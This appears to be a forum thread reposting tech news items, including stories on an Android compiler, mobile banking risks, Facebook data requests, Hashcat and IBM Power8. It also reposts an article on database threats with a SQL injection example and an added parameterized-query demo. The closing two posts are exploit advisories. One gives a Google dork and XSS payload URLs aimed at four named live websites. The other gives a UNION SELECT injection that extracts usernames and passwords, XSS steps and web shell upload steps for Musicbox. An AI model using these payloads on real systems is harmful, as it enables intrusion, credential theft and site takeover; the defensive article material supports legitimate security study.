It can only produce code for Android – and specifically, Android version 4.0 and up (releases codenamed "Ice Cream Sandwich" and "Jelly Bean"). You can't use the compiler on just any development machine, either. Neither Windows nor OS X is supported; the tools are only certified for use with Ubuntu 10.04 or 11.04 (the latter version being nearly two and a half years old). Versions for other platforms may be forthcoming – Intel says "stay tuned." In an unusual move, Intel is making this first version of its Android compiler available as a free download for a limited time. By comparison, Intel C++ Composer XE 2013, Chipzilla's C++ tools collection for desktop operating systems, retails for $699 (£450) for Windows, Linux, or OS X. The company isn't saying how long the tools will be available for no charge, or what will happen after that. To get the compiler, head on over to Intel's registration site where you will be asked to submit your email address to receive a personalized download link.
Source TheRegister.co.uk
  14. The rise of mobile banking technologies poses major risks to consumers around issues of fraud, theft and input errors caused by small keypads, according to a government financial watchdog. The Financial Conduct Authority (FCA) has published a report on the issues around mobile banking in which it noted that while the technology has clear benefits for consumers, banks and telecoms companies have a responsibility to ensure consumers are protected. For example, it cited malware and viruses hidden within applications offered by banks as a serious threat that must be tackled. "Malware is an important risk for firms to consider, as it can result in financial loss and undermine consumer confidence in mobile banking," the report said. The IT running mobile systems must be robust enough to meet customer needs, or firms risk serious issues, the report noted. "There is a risk that an IT failure could interrupt services, preventing access to mobile banking, limiting customers’ access to their money and undermining consumer confidence in these services," it said. "The potential impact of this may grow as consumers increasingly rely on mobile banking. We recognise that firms may be under strong commercial pressure to develop and launch products quickly, which could risk services being released without sufficient testing and protection." Even the keypads offered on smartphones were cited as a potential cause for issues, as customers could enter the wrong information. "Mobile phones, with their smaller screens and limited keypad, may make errors more likely, therefore it is important for us to understand how firms are mitigating this risk," it said. Clive Adamson, director of supervision at the FCA, said the preliminary report from the organisation, which is the precursor to a longer, more detailed report to be launched in 2014, was a vital piece of work to ensure this burgeoning technology was properly supervised.
"Mobile banking is an exciting development in financial services. With the market growing, now is the right time for us to take stock and, as part of the FCA's forward-looking approach, to ensure that consumers are appropriately protected,” he said. "By publishing these initial thoughts we want to make sure that the industry knows exactly what we’re looking into, and consumers have a clearer idea of some of the potential risks." The report comes as mobile financial transactions rocket in use, with major payment firms such as Visa, MasterCard and Barclays all innovating in this space. Visa has predicted that 52 million contactless payments will be made every month across Europe by the end of 2013 as it declares ‘war on cash’. Meanwhile Barclays has said that £10bn has been sent via its mobile services, such as Pingit, since their introduction. IT glitches are already a cause of serious headaches for banks, with RBS facing a £125m charge for issues in June 2012, which halted overnight payments between accounts. Source V3.CO.UK
  15. UK authorities requested data on 2,337 Facebook users from the firm in the first six months of 2013, as the social network reveals data on the government data requests it receives for the first time. In total, 1,975 requests were made, meaning some submissions concerned more than one user at a time. In total, 68 percent of these requests for data were granted by Facebook. Only the US, with between 10,000 and 11,000 requests for data on between 20,000 and 21,000 users, and India, with 3,245 requests for data on 4,144 members of the site, filed more submissions to Facebook than the UK. Facebook was required by law to produce data for 79 percent of the requests from the US and 50 percent from India. Hong Kong and Iceland had 100 percent of requests granted, but this was from just one submission each. Colin Stretch, Facebook’s general counsel, said the firm was releasing the information in order to prove that while it complied with the laws when required, it did not hand over data to the government whenever asked. This comes after the PRISM revelations leaked by Edward Snowden, which suggested the UK and US authorities had unchecked access to the data held by tech giants such as Facebook. “As we have made clear in recent weeks, we have stringent processes in place to handle all government data requests. We scrutinise each request for legal sufficiency under our terms and the strict letter of the law, and require a detailed description of the legal and factual bases for each request," he said. "We fight many of these requests, pushing back when we find legal deficiencies and narrowing the scope of overly broad or vague requests. When we are required to comply with a particular request, we frequently share only basic user information, such as name." Stretch added that the government should not be entitled to data on web users without accountability and that by publishing such data it would allow others to keep track of its data demands.
“As we have said many times, we believe that while governments have an important responsibility to keep people safe, it is possible to do so while also being transparent. Government transparency and public safety are not mutually exclusive ideals,” he said. “Each can exist simultaneously in free and open societies, and they help make us stronger. We strongly encourage all governments to provide greater transparency about their efforts aimed at keeping the public safe, and we will continue to be aggressive advocates for greater disclosure.” Facebook joins other sites such as Google and Twitter in releasing information on the data it is asked for by governments, which shows the importance governments around the world place on data posted on social sites.
Source V3.CO.UK
  16. You have to admire Google sometimes. Sometimes they do the right thing. Sometimes. Consider the company's recent decision to tighten up internal requirements for SSL/TLS certificates to conform with the Baseline Requirements of the CA/Browser Forum. SSL/TLS certificates are a crucial tool for making the Internet trustworthy. The problem which led to this decision was the discovery that an unnamed certificate authority (OK, it's GoDaddy) was issuing certificates with a lifespan in excess of the maximum 60 months allowed by the Baseline Requirements. Why should certificates have a maximum life span? Excessive life spans allow certificates with policies which should have expired a long time ago to continue functioning. Cryptographic methods have a shelf life. After a time, security research and Moore's Law have a way of finding vulnerability in algorithms which were previously unbreakable. Perhaps the biggest such problem we have these days is the MD5 hash algorithm, although there are many ciphers as well which have lost trustworthiness over time. This is why it's good that certificates have relatively brief lives, so that they can be assured access to the latest security tech. So if these are valid concerns for SSL/TLS, why does Google laugh them off for Android code signing? Google's policies for code signing of Android apps for distribution in the Google Play store mandate that the certificates for the signatures have very, very long validity periods: If you plan to publish your application(s) on Google Play, the key you use to sign the application(s) must have a validity period ending after 22 October 2033. Google Play enforces this requirement to ensure that users can seamlessly upgrade applications when new versions are available. At the time this policy was promulgated, I believe the date was 25 years in the future.
Google's stated security model for Android is that the code signature is used merely so that the company can tell which apps were written by the same developer. They are not designed to identify the issuer of the code, except to the degree that he is also the issuer of other code signed with the same keys. Google then goes on to add this little bit of disingenuousness: The certificate does not need to be signed by a certificate authority: it is perfectly allowable, and typical, for Android applications to use self-signed certificates. The implication in this statement is that you can use a trusted certificate authority, but it's not necessary. Of course, if you get a certificate from a trusted CA, it will have to have a 20+ year term. Who's going to buy that? The really deep-discount CAs (Comodo, for example) have gotten a 5 year certificate down to several hundred dollars, meaning a 20 year cert would have to cost in the thousands. But the very idea of asserting a trust statement for an organization with a 20 year life is somewhat absurd, so no reputable CA would offer it. I would argue that the identity features of code signing are worthwhile, and Google is mistaken, not just to make them optional, but impossible. Remember that Google's effective insistence on self-signing facilitates impersonation, a potentially useful tool for those trying to induce users to install malicious apps. But even if you accept that identity is overrated, you are still left with the reasons, stated above, for why SSL/TLS certificates with long validity periods are unwise: they lock in security policies which may, over time, become antiquated. Code signing is a high-value attack target to begin with. The origin of this Google policy lies not in security, but in market imperatives. At the time Google created Android and opened it up to the world, the iPhone was firmly established and had major traction with app developers.
Google needed to attract those developers and induce them to develop for the then-speculative Android. The number of apps available for the iPhone (then probably just in the tens of thousands) was a key marketing point. So, in order to make it as cheap and easy as possible to code for Android, Google eliminated the whole certificate management part of it. There is still a $25 registration fee for the developer program, so if you blow your reputation with Google you may need to pony up another $25 to start distributing malware again. Google got their wish; developers have flocked to Android, even if many of them are not the right kind of people. And as a result, everyone knows that the only real action in mobile malware is on Android. Apple, Microsoft and BlackBerry all use real code signing for their app stores. Why are up-to-date certificates, issued by trusted authorities which verify the identity of the customer, good enough for them, and for SSL/TLS sites, but not good enough for Android developers?
Source ZDnet.Com
  17. Choosing a difficult password might not be enough to protect our accounts in the future. We are admittedly often lax when it comes to choosing difficult-to-guess passwords, and we forget to change them on a regular basis. Rather than trying to remember complex sets of words and numbers, a worryingly high number of us use very simple phrases to protect accounts ranging from email to social media and those used to access corporate systems. In a survey last year, security software developer Splashdata found that the most common passwords used in 2012 included "qwerty," "12345678" and "Password1" -- phrases that wouldn't require a code breaker to guess. However, thanks to the updated password cracker ocl-Hashcat-plus, even more complex combinations are unlikely to protect targeted data. As reported by Ars Technica, the easily available password breaker ocl-Hashcat-plus has received a series of improvements which allow it to accommodate passwords of up to 55 characters. The ocl-Hashcat-plus version of the password cracker had previously been limited to solving sequences of up to 15 characters. This quicker variation of Hashcat and Hashcat-lite, released over the weekend, has the potential to crack passwords of up to 64 characters -- depending on the hash being targeted. In the release notes, lead Hashcat developer Jens Steube said that support for passwords longer than 15 characters was "by far one of the most requested features" in the update. "We resisted adding this 'feature,' as it would force us to remove several optimizations, resulting in a decrease in performance for the fast hashes," Steube writes. "The actual performance loss depends on several factors (GPU, attack mode, etc), but typically averages around 15 percent." After modifying 618,473 total lines of source code over six months, the new version is able to conduct eight billion guesses per second on a high number of hashes, and attacks can be tailored depending on which firm has been targeted.
Named the Password Analysis and Cracking Kit (PACK), this update optimizes the password cracking process, rather than breaking sequences itself. The update also supports a number of new algorithms, including TrueCrypt 5.0, 1Password, Lastpass, MacOSX v10.8, Microsoft SQL Server 2012 and Samsung Android Password. Perhaps eventually the only solution to password theft will be to go back to the physical realm for security. Google is one such company looking at new ways to scupper hacker efforts by developing password-replacing jewellery that would open your account through a system of authentication potentially more difficult to breach.
Source Zdnet.Com
  18. Big iron sales are still generating $6bn to $7bn a year for IBM - which is enough to justify designing its own Power processors and building its own wafer baker. At the Hot Chips conference at Stanford University on Monday, some of the chief architects behind the Power8 electronics were on hand to show off the feeds and speeds of the next-generation motor for the company's Power Systems lineup. Significantly, the Power8 chip is also the foundation for Big Blue's OpenPower consortium - an effort to make it easier to hook networking, accelerators and other features into Power processors by allowing third parties to license chunks of intellectual property in the style of ARM Holdings and its RISC cores. IBM announced the OpenPower effort earlier this month, with GPU maker Nvidia, network chip maker Mellanox Technologies, motherboard maker Tyan, and advertising moneymaker Google all lending their support to the cause. Whether or not the OpenPower effort gains traction remains to be seen; the Power8 is so clearly engineered for midrange and enterprise systems for running applications on a giant shared memory space, backed by lots of cores and threads. Power8 does not belong in a smartphone unless you want one the size of a shoebox that weighs 20 pounds. But it most certainly does belong in a badass server, and Power8 is by far one of the most elegant chips that Big Blue has ever created, based on the initial specs. Jeff Stuecheli, who has the title of chief nest architect for the Power8 processor, gave the presentation at Hot Chips going over the feeds and speeds. If the cores on a Power chip are the eggs, then the chief nest architect worries about all of the other things that surround the cores - what Intel calls the uncore regions when it talks about chips. 
The Power8 nest is lined with L3 caches, PCI-Express and DDR memory controllers, various other accelerators to speed up functions that might otherwise run on the cores, and the NUMA interconnects for implementing shared memory across multiple sockets. With the Power8 chip, IBM has a few goals. First, the company is shifting from the 32-nanometer processes used for the relatively recent Power7+ chips to a 22-nanometer process. The shrinking of the transistor gates allows IBM to add more features to a die, crank the clocks, or do a little of both. Judging from the Power8, it looks like IBM is content to keep in the same clock speed range as the Power7+ chips - around 4GHz, give or take a little. It'll also move PCI-Express 3 controllers into the chip package to keep those hungry little Power8 cores fed; these controllers will offer a coherent memory protocol to external accelerators as well as a new cache hierarchy that goes all the way out to the L4 cache. As expected, IBM is also goosing the number of processor threads per core with Power8, doubling it up to eight per core. IBM has been vague about how many cores it might squeeze onto a die with the 22-nanometer shrink, and it could probably have done as many as sixteen cores if it had not added so much eDRAM L3 cache memory with the Power7+ and then boosted it even further with the Power8. On the workloads that Big Blue is targeting with its Power Systems iron, having more cache and cores running at near peak utilisation is more important than having lots of cores on a die. Just as is the case for mainframes, at the prices that IBM has to charge for Power Systems servers, the chip has to be architected to run at close to full-tilt-boogie in a sustained manner. If IBM can do that, then it can garner the prices it commands and the profits we all presume it gets from Power Systems.
The Power8 chip is implemented in IBM's familiar high-k metal gate processes, which include copper and silicon-on-insulator technologies in a 22-nanometer process. The precise transistor count was not given during the presentation, but the Power8 chip weighs in at 650 square millimetres; this is a bit bigger than Power7+, which used a 32-nanometer process, had 2.1 billion transistors, and a surface area of 567 square millimetres. The Power8 core has a total of sixteen execution pipes. These include two load store units (LSUs) and a condition register unit (CRU), a branch register unit (BRU), and two instruction fetch units (IFUs). There are two fixed-point units (FXUs), two vector math units (VMXs), a decimal floating unit (DFU), and one cryptographic unit (not labeled in the core diagram above). Each core now has eight threads implemented using simultaneous multithreading (what IBM calls SMT8), instead of four threads per core with the Power7 and Power7+ chips. And like earlier Power chips, this SMT is dynamically tuneable so a core can have one, two, four, or eight threads fired up. Source TheRegister.co.uk
  19. As the title says, I propose that that chat be closed. Arguments:
- The purpose of this chat is not respected. If someone comes in and asks for help, they don't get any.
- That chat is not a chat. Chat = Kabron. From morning till evening there's no room to say a word about anything other than muscles.
- Nothing related to IT is discussed. From morning till evening there are only conversations between Kabron and his best friend Elchief.
- The rules are not respected. If you enter the chat and you're not friends with Kabron or ElChief you get threatened, provoked into swearing, and then you automatically get a lousy kick.
- All day long there are discussions about anything but IT.
- It only attracts scandals and threats.
- If you get kicked from the chat you're threatened with a ban on the forum too (sometimes you actually get one).
In conclusion, that chat is useless. Since the chat was created, Yahoo Messenger no longer exists for certain individuals and they've moved over there from 6 in the morning, as Kabron alias Karton says. Those are my arguments. Whoever is for votes yes, whoever is against votes no. Simple and to the point. Don't go off-topic, don't try to contradict me, it's my suggestion, I've given my arguments, let people vote.
  20. Introduction
This post introduces the principal database vulnerabilities, providing an overview of the possible effects of their exploitation. For each database vulnerability, the principal cyber threats are exposed and a few suggestions are proposed for their mitigation. In the second part of the article interesting statistics related to the incidents/data breaches in private sectors and related costs are explored.
Database Vulnerabilities
According to the latest security reports released by principal security firms, hackers consider database vulnerabilities as principal flaws to exploit in order to bypass the defenses of targets. The Imperva security firm recently issued a very interesting report that explains which are the principal database vulnerabilities for enterprises and how hackers exploit them. I strongly suggest reading the report, which provides for each threat a detailed description and techniques for its mitigation. I personally created a list of the “Top Ten Database Security Threats” based on the security threat reports proposed by principal security companies, including Imperva, from 2010 to 2013.
1. Excessive privilege abuse
2. Legitimate privilege abuse
3. Privilege elevation
4. Exploitation of vulnerable, misconfigured databases
5. SQL injection
6. Malware
7. Denial of service
8. Database communication protocol vulnerabilities
9. Unauthorized copies of sensitive data
10. Backup data exposures
Probably many IT technicians still ignore many of them, and the success of so many attacks against enterprises and organizations is the demonstration that a database flaw doesn’t mean only “SQL Injection”! The adoption of a multi-layered database security defense strategy is strongly suggested; the adoption of best practices and the implementation of internal controls could sensibly reduce the risk of data exposure caused by various attack vectors.
The matrix below identifies solutions for each of the top 10 database threats proposed by Imperva in its last study:
Figure 1 – Matrix Threat – Solution (Imperva)
Privilege Abuse
The first three points in the above list are related to the abuse of database privilege settings. In both cases, “legitimate privilege” and “excessive privilege,” the principal source of the problem is represented by the grant of unnecessary access privileges to users or applications, with a consequent increase of the attack surface. In the third case, the threat is represented by privilege elevation operated by hackers. The mitigation for this category of database vulnerabilities is the elimination of any excessive rights; of course, this requires an additional effort for administrators, who have to identify excessive rights by analyzing the real business needs of each user. This task could be executed manually, but it is considered time-consuming; that’s why large enterprises have deployed specific solutions for the analytical process. The access rights could be managed at various levels: security experts consider the optimal choice to be controlling query-level access, discriminating SQL operations (SELECT, UPDATE, etc.) and data for each entity that accesses the system. “Query-level access control is useful not only for detecting excessive privilege abuse by malicious employees, but also for preventing most of the other top ten threats described herein. Most database software implementations integrate some level of query-level access control (triggers, row level security, etc), but the manual nature of these “built-in” features makes them impractical for all but the most limited deployments.
The process of manually defining a query-level access control policy for all users across database rows, columns and operations is simply too time consuming.” Another element to consider is the exploitation of legitimate privileges that could be abused by ill-intentioned users to obtain access to the corporate database: it is possible, for example, that malware on the machine could capture the database credentials to retrieve information stored in the archive. A possible solution to legitimate privilege abuse is the deployment of context-based database access controls enforcing policy for client applications, time of day, and location. In this way, it is possible to discriminate the legitimate use of database access privileges. Hackers typically follow alternative ways, trying to exploit target software vulnerabilities to escalate access privileges to those of an administrator. Attackers could exploit vulnerabilities in stored procedures, built-in functions, and even SQL statements to increase their access privileges. To prevent this type of attack, businesses use a combination of intrusion prevention systems (IPS) and query-level access control.
Misconfigured Databases and Lack of Input Validation
Attackers could benefit from unpatched databases or archives not properly configured that still have default accounts and configuration parameters. The first step of a penetration test is the analysis of those flaws. An efficient patch management process, especially for large enterprises, could reduce the time of exposure after the release of new database patches; vulnerability assessment activities could also support the mitigation of those cyber threats.
SQL Injection
SQL injection is probably the most popular vector of attack for databases. In a typical attack, the hackers inject unauthorized database statements into a vulnerable SQL data channel, such as stored procedures and web application input parameters.
These injected statements are specifically crafted to be executed on the database side for malicious purposes. The successful execution of a SQL injection attack can give the attackers unrestricted access to an entire database. If these injected statements are executed by the database, critical data stores can be viewed, copied, and altered. “Preventing SQL Injection – Three techniques can be combined to effectively combat SQL injection: intrusion prevention (IPS), query-level access control (see excessive privilege abuse), and event correlation. IPS can identify vulnerable stored procedures or SQL injection strings. However, IPS alone is not reliable, since SQL injection strings are prone to false positives. Security managers who rely on IPS alone would be bombarded with ‘possible’ SQL injection alerts. However, by correlating a SQL injection signature with another violation, such as a query-level access control violation, a real attack can be identified with extreme accuracy. It’s unlikely that a SQL injection signature and another violation would appear in the same request during normal business operation.” Malicious attackers successfully use SQL injection on legitimate web sites using various techniques: they often use a search engine’s index to find vulnerable websites by means of one of the numerous DIY SQL injection tools available on the black market. The availability of the DIY Google Dorks based hacking tool allows ill-intentioned people to acquire precious information on remotely exploitable websites, data that could be used to compromise them, for example by deploying a malicious exploit kit or exploiting known vulnerabilities. The tool relies on Google Dorks for target evaluation. In particular, the DIY Google Dorks based hacking tool has built-in features that can be used to evaluate the possibility of performing a SQL injection attack or to discover all the targets that aren’t protected by a CAPTCHA challenge mechanism.
Cybercriminals could also rely on botnets actively crawling a search engine’s index, looking for websites vulnerable to SQL injection attacks. One of the most popular mass SQL injection attacks affected over a million web sites in October 2011, an offensive directly connected to the Lizamoon mass SQL injection attacks.
Example
Let’s use a very simple query as an example:
SELECT fields FROM myTable WHERE field = '$EMAIL';
where $EMAIL is an email address provided by the user via a web form. If an ill-intentioned user provides the following input in the email field, and it is not validated:
dummy' OR '1'='1
the resulting SQL will be
SELECT fields FROM myTable WHERE field = 'dummy' OR '1'='1';
Due to the presence of the '1'='1' condition, which is always TRUE, the query returns every item in myTable.
Denial of Service (DoS) and Database Communications Protocol Vulnerabilities
Exactly like any other service, a database can suffer a denial of service attack; there are various ways to flood a DBMS with requests that may impede the database from providing data to intended users. DoS may be achieved by exploiting database platform vulnerabilities to crash a server, flooding the system with requests, or using specifically designed malware. Protection from these cyber threats needs a multiple level defense system that has the capability to recognize the sources of attack and apply the needed countermeasures. It’s fundamental to put in place defensive measures at network, application, and database level. Principal classes of DoS attack are:
- Abuse of functions
- Complex queries
- Bugs and defects in the database
- Application usage
Another critical element for database security is represented by the communications protocol, which could be exploited by attackers to obtain unauthorized access to the data.
The principal database vendors are aware of cyber threats related to the communication protocols; the majority of recent security fixes released by IBM and Oracle are related to protocol vulnerabilities. The SQL Slammer worm represents a perfect example of malicious code designed to exploit a flaw in a Microsoft service. The most efficient countermeasure against database communication protocol attacks is protocol validation, designed to parse traffic and block malicious traffic when anomalous patterns are detected.
Data Exposure
Data exposure could be caused by various factors. For example, it is possible that data backup devices are stolen or that unauthorized copies of sensitive data are accessed by unauthorized entities. The principal cause of data exposure is the absence of a secure mechanism for protecting database copies. In many cases, companies that were victims of incidents did not have an inventory of all their databases and related backups. Each database is a mine of information and could contain sensitive data that needs access control. Outdated database instances represent one of the principal weaknesses for organizations; numerous security audits revealed the absence of proper management of media containing old copies of the databases. A company must identify all databases within internal infrastructures and the data contained; for each archive it has to define privileges of access and keep track of every activity during its lifecycle, from its creation to the disposal of the storage media. Data classification is a must, identifying the sensitive information within the archives. It is also strongly suggested to discover combinations of data that could expose confidential information: even though the same data could appear innocuous on its own, combined it could reveal sensitive data.
An accurate inventory of databases, including the location of sensitive data and access controls, should be set in compliance with corporate data access policies. To prevent backup data exposure it is also necessary to encrypt the backups.

Malware and Databases

Another serious menace for the database is represented by the most classic cyber threat, malware. Malware authors could in fact design malicious code to automate the exploitation of one of the above points; the principal purposes of those malicious agents are information stealing and sabotage. The damage to an enterprise database could have serious repercussions on the business of private companies. One of the most popular agents that targeted victims’ databases is the W32.Disttrack malware, also known as Shamoon, which is able to wipe out data from infected PC hard disks. In November 2012, Symantec published a security alert on a new malware dubbed W32.Narilam that was designed to damage corporate databases. Exactly like Shamoon, this malware hit a specific geographic area, the Middle East.

Figure 2 – Narilam diffusion (Symantec)

The W32.Narilam worm attempts to spread by copying itself to all drives and certain shared folders on the victim’s PC. There were no instances that included a module to steal information from the victims. The worm was designed to attack SQL archives; it was able to search for database instances having one of the following names:

- alim
- maliran
- shahd

Once the database instance was found, the malware was able to access database objects to manipulate them; it was also able to delete the entire archive. The malware was designed to find objects with specific names belonging to the Arabic and Persian languages (e.g., hesabjari, which means “current account” in Arabic/Persian).
Narilam was written in the Delphi programming language and has a behavior similar to other malicious agents, but what is considered “unusual” by security researchers is its capability to update a Microsoft SQL database if it is accessible by OLEDB. The investigation revealed that the malicious code was designed to target mainly corporations: the percentage of business users hit is 97.1%, while non-business users are at 2.9%. The Symantec report stated:

“Unless appropriate backups are in place, the affected database will be difficult to restore. The affected organization will likely suffer significant disruption and even financial loss while restoring the database. As the malware is aimed at sabotaging the affected database and does not make a copy of the original database first, those affected by this threat will have a long road to recovery ahead of them.”

A few days after its discovery, the Iranian national CERT, also known as “Maher,” announced that “Narilam” was an already known malware detected for the first time in 2010 and that it didn’t represent a serious cyber threat like other agents that hit the Iranian region. The simple nature of the malware looks more like an attempt to harm the software company’s reputation among its customers.

The Cost of a Data Breach in the Private Sector

We have now listed the principal vulnerabilities related to a database. Unfortunately, the cost related to a data breach is still very high, and its analysis is necessary to highlight the importance of adopting proper countermeasures to mitigate the risk of incidents/cyber attacks. In May 2013, the Ponemon Institute published its annual analysis on the cost related to accidental data exposure. The paper, titled “2013 Cost of Data Breach Study: United Kingdom,” is benchmark research sponsored by Symantec and independently conducted by the institute. The study is focused on the cost of data breach incidents for companies located in the UK.
It examines the costs incurred by 38 UK companies in 12 industry sectors after these businesses experienced the loss or theft of protected personal data and then had to notify breach victims and/or regulators as required by law. Let’s start with some alarming data: the average per capita cost of an incident increased from £79 to £86, and the cost of data breach continues to rise for the sixth consecutive year.

Figure 3 – The average per capita cost of data breach over six years (Ponemon Institute)

The organizational cost grew from £1.75 million to £2.04 million. Negligence is considered the main cause of data breaches (accounting for 37% of incidents), confirming the need to establish a strong commitment to the diffusion of a security culture within corporates.

Figure 4 – The average total organizational cost of data breach over six years (Ponemon Institute)

The study revealed that malicious attacks also increased, from 31% to 34%, and related data breaches are generally considered the most costly. The per capita cost of a data breach caused by malicious or criminal attacks was £102.

Figure 5 – Per capita cost for three root causes of data breach (Ponemon Institute)

The cost of data breaches due to system or business process failures was £79, and the loss for data breaches caused by employee or contractor negligence was £76 per compromised record. Lost business costs (including the abnormal turnover of customers, increased customer acquisition activities, reputation losses, and diminished goodwill) rose from £779 thousand in 2011 to £921 thousand in 2012. Lost business cost has nearly doubled over the last six years; ex-post response and detection costs (e.g., activities that attempt to address victims’, regulators’, and plaintiff counsels’ concerns about the breach incident, and legal and consulting fees that attempt to reduce business risk and liability) also increased from approximately £451 thousand in 2011 to £508 thousand in 2012.
Conclusion

The data presented by the Ponemon Institute demonstrate how insidious and expensive the cyber threats that target vulnerabilities in databases are. Despite the high level of awareness of the principal menaces, the number of incidents has increased in recent years, and the cost suffered by victims of incidents or data breaches has also increased. To reduce the impact of these events, an organization needs to prepare a formal incident response plan; the adoption of proper procedures could, in fact, reduce the total cost of a data breach. Organizations have to define and adopt a strong security policy sustained by a strong commitment of top management, and the policy must include corporate database security. The hiring of outside consultants could also contribute to improving both the process of security policy definition and the definition/implementation of data breach response. Security of databases is a critical element of the cyber security policy of any company, but the data related to the incidents seems to suggest to us that organizations still don’t perceive it!

References

http://www.imperva.com/docs/WP_TopTen_Database_Threats.pdf
http://docs.media.bitpipe.com/io_10x/io_102267/item_692230/2013%20Report%20UK%20CODB%20FINAL%2041.pdf
W32.Narilam, the malware that hit databases in Middle East - Security Affairs
Shamoon Malware, cyber espionage tool, cyber weapon or ... - Security Affairs
Hacking with new DIY Google Dorks based hacking tool!
W32.Narilam | Symantec
https://www.owasp.org/index.php/SQL_Injection
Dancho Danchev's Blog - Mind Streams of Information Security Knowledge: Massive SQL Injection Attacks - the Chinese Way
https://securosis.com/blog/database-denial-of-service-the-attacks

Source : Resources.InfoSecInstitute.Com
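The tautology injection walked through in the article's Example section, as an added illustration that is not part of the reposted article: the query assembled by string interpolation next to the same query with a bound parameter, run against a constructed in-memory SQLite table, plus a coarse log-alerting signature for the payload shape. The table contents, the sample addresses and the regex are all constructed for this example.

```python
import re
import sqlite3

# Constructed sample rows standing in for the article's "myTable".
ROWS = [("alice@example.com",), ("bob@example.com",), ("carol@example.com",)]


def _fresh_db() -> sqlite3.Connection:
    """In-memory table with the article's column name, populated with ROWS."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE myTable (field TEXT)")
    conn.executemany("INSERT INTO myTable VALUES (?)", ROWS)
    return conn


def lookup_vulnerable(email: str) -> list[str]:
    """The article's pattern: SELECT ... WHERE field = '$EMAIL' assembled by
    string interpolation.  A quote in the input closes the literal early, so
    the rest of the input is parsed as SQL rather than stored as a value."""
    sql = f"SELECT field FROM myTable WHERE field = '{email}'"
    return sorted(r[0] for r in _fresh_db().execute(sql))


def lookup_parameterized(email: str) -> list[str]:
    """Same query with a bound parameter.  The driver sends the input as data,
    so quotes and OR clauses inside it can never alter the statement."""
    sql = "SELECT field FROM myTable WHERE field = ?"
    return sorted(r[0] for r in _fresh_db().execute(sql, (email,)))


# Coarse signature for the post's payload shape: a quote, then OR, then an
# always-true comparison such as '1'='1.  Constructed here for log alerting;
# it complements, and does not replace, parameterized queries.
TAUTOLOGY = re.compile(r"'\s*or\s*'?\w+'?\s*=\s*'?\w+", re.IGNORECASE)


def looks_like_tautology(value: str) -> bool:
    """True when a submitted form value matches the tautology signature."""
    return TAUTOLOGY.search(value) is not None


if __name__ == "__main__":
    payload = "dummy' OR '1'='1"
    print("vulnerable:    ", lookup_vulnerable(payload))     # all three rows leak
    print("parameterized: ", lookup_parameterized(payload))  # [] - no such address
    print("flagged:       ", looks_like_tautology(payload))  # True
```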
  21. You can also tell from the title.
  22. Description : The WordPress Post-Gallery plugin suffers from a cross site scripting vulnerability. Note that this finding houses site-specific data.
  Author : IeDb
  Source : WordPress Post-Gallery Cross Site Scripting ≈ Packet Storm
  Code :
  The Wordpress post-gallery Plugin suffers from a Cross-Site Scripting vulnerability.
  #################################
  # Iranian Exploit DataBase Forum
  # http://iedb.ir/acc
  # http://iedb.ir
  #################################
  # Exploit Title : Wordpress post-gallery Plugin Xss vulnerabilities
  # Author : Iranian Exploit DataBase
  # Discovered By : IeDb
  # Email : IeDb.Team@Gmail.com
  # Home : http://iedb.ir - http://iedb.ir/acc
  # Software Link : http://wordpress.org/
  # Security Risk : High
  # Tested on : Linux
  # Dork : inurl:/post-gallery/thirdparty/phpthumb/
  #################################
  # Exploit :
  # http://site.com/wp-content/plugins/post-gallery/thirdparty/phpthumb/phpThumb.php?src=[Xss]
  # Dem0 :
  http://www.knappenforeningen.no/wp/wp-content/plugins/post-gallery/thirdparty/phpthumb/phpThumb.php?src="><script>alert(/IeDb.Ir/)</script>
  http://monsterbike.eu/wp-content/plugins/post-gallery/thirdparty/phpthumb/phpThumb.php?src="><script>alert(/IeDb.Ir/)</script>
  http://www.yerevanmagazine.com/wp-content/plugins/post-gallery/thirdparty/phpthumb/phpThumb.php?src="><script>alert(/IeDb.Ir/)</script>
  http://www.bambusudsalg.dk/wp-content/plugins/post-gallery/thirdparty/phpthumb/phpThumb.php?src="><script>alert(/IeDb.Ir/)</script>
  #################################
  # Tnx To : TaK.FaNaR - l4tr0d3ctism - r3d_s0urc3 - Bl4ck M4n - F??iD - Medrik - Achraf - Dj.TiniVini
  # B3hz4d - C0dex - Beni_Vanda & All Member In Iedb.ir/acc & Iranian Hackers
  #################################
  # Exploit Archive = http://www.iedb.ir/exploits-411.html
  #################################
  23. Description : Musicbox version 2.3.8 suffers from cross site scripting, remote shell upload, and remote SQL injection vulnerabilities.
  Author : DevilScreaM
  Source : Musicbox 2.3.8 Cross Site Scripting / Shell Upload / SQL Injection ≈ Packet Storm
  Code :
  #Exploit Title : Musicbox 2.3.8 Multiple Vulnerabilities
  #Author : DevilScreaM
  #Date : 25/08/2013
  #Category : Web Applications
  #Vendor : http://www.musicboxv2.com/
  #Version : 1.0 - 2.3.8
  #Dork :
  intext:Musicbox Version
  intext:Musicbox Version 2.3.8 © 2008
  inurl:genre_albums.php?id=
  #Vulnerability : SQL Injection Vulnerability, XSS Vulnerability, Shell Upload Vulnerability
  #Tested On : Windows 7 32 Bit (Mozilla & Chrome)
  #Greetz : Newbie-Security.or.id

  SQL Injection Vulnerability
  http://site-target/genre_albums.php?id=[SQLI]
  Example
  http://site-target/genre_albums.php?id=-3+UNION SELECT 1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10+from+users--
  ==========================================================================================
  Cross site scripting / XSS Vulnerability
  *Search
  1. Go To Feature Search
  2. Input your Cross Site Scripting, Example "<h1>Tested by DevilScreaM</h1>" , Click Search
  3. See Result or See with URL
  http://site-target/index.php?in=song&term=[Cross site scripting/XSS]&action=search&start=0
  Example
  http://site-target/index.php?in=song&term=<h1>Tested by DevilScreaM</h1>&action=search&start=0
  ========================================================================================
  *News Profile
  1. Register To Website or go to link http://site-target/register.php
  2. Login to Website
  3. Go to Menu [ My News ]
  4. At News Heading input your XSS, Example <h1>Tested by DevilScreaM</h1> And at Details input your XSS or Text
  See your XSS at http://site-target/member.php?uname=[YOUR_USERNAME]
  Example http://server/musicbox/member.php?uname=devilscream
  ==========================================================================================
  Shell Upload Vulnerability
  *Artist Gallery
  1. Go to Admin Page, And Login
  2. Go to Upload Artist Image or Go to Link http://site-target/admin/adminpanel.php?action=artistgallery
  3. Select Your Shell/Backdoor , And Click Submit
  4. Result Upload At http://site-target/artist_gallery/Your_Backdoor.php
  ============================================================================================
  *Album Gallery
  1. Go to Admin Page, And Login
  2. Go to Upload Album Image or Go to Link http://site-target/admin/adminpanel.php?action=albumgallery
  3. Select Option, Example Option "All Album", And Click Submit
  4. Select Your Shell/Backdoor , And Click Submit
